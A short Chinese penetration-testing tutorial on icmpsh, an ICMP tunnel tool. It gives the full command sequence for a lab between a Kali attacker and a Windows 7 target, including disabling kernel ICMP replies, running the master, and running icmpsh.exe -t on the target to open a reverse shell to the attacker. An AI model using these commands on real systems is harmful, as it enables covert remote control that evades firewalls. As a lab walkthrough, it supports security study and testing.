【渗透测试】ICMP隧道技术之icmpsh使用
一、使用场景
icmp隧道技术多用于服务器未开启任何端口时,但能够通过icmp协议通讯,即能够ping通对方
二、icmpsh
icmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,icmpsh的优点是在目标机器上运行时不需要管理员权限。 这一工具干净、简单并且便携。受控端(客户端)使用C语言实现。只能运行在目标Windows机器上,而主控端(服务端)由于已经有C和Perl实现的版本,而且之后又移植到了Python上,因此可以运行在任何平台的攻击者机器中。 icmpsh很容易被安装并用作c2通道。可以通过Github下载并在攻击者机器中部署icmpsh。
三、环境
kali:10.43.32.28/24
win7:10.43.32.30/24 同一个网段
1、下载工具:(git或者zip)
git clone https://github.com/inquisb/icmpsh.git
2、安装需要的python库文件
pip2 install impacket
3、关闭本机的icmp应答,防止内核对自己的ping包响应
sysctl -w net.ipv4.icmp_echo_ignore_all=1
后面实验结束之后在自行调整过来即可
sysctl -w net.ipv4.icmp_echo_ignore_all=0
python2 icmpsh_m.py 10.43.32.28 10.43.32.30
[攻击机ip][目标机ip]
4、目标机执行命令(这里需要各种手段把icmpsh.exe放到目标机上)
icmpsh.exe -t 10.43.32.28
[攻击机ip]
攻击机上成功反弹shell
参考: https://blog.csdn.net/Zlirving_/article/details/113780982?utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_title~default-0.no_search_link&spm=1001.2101.3001.4242.
https://blog.csdn.net/Zlirving_/article/details/113780982?utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_title~default-0.no_search_link&spm=1001.2101.3001.4242.
|